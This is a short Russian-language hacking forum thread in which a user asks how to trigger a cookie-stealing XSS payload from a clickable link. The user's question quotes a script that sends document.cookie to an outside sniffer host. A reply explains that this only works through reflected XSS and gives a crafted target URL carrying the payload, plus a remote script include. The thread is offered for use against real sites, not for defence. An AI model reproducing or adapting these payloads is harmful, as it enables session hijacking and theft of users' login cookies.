у меня вопрос, можно ли сделать так, чтобы XSS

<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script>

выполнялся не через отправку сообщения "Жалоба", а после нажатия на ссылку, оставленную в простом сообщении???

или надо сделать страницу на php, с каким-то ещё методом....

вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS....

вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS....


<a href=... onclick="javascript:...">ссылка</a>


можно ли сделать

Нельзя.

Если тебе нужна просто ссылка то можно если там есть пассивный XSS. Например _http://target.com/search.php?string=что нибудь на русском<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script> либо <script src=http://zzzzzz.com/xss.js?<b>Но это на ламёров.

Ещё можно попробовать так http://forum.antichat.ru/thread9910-explorer.html

спасибо, буду разбираться и думать....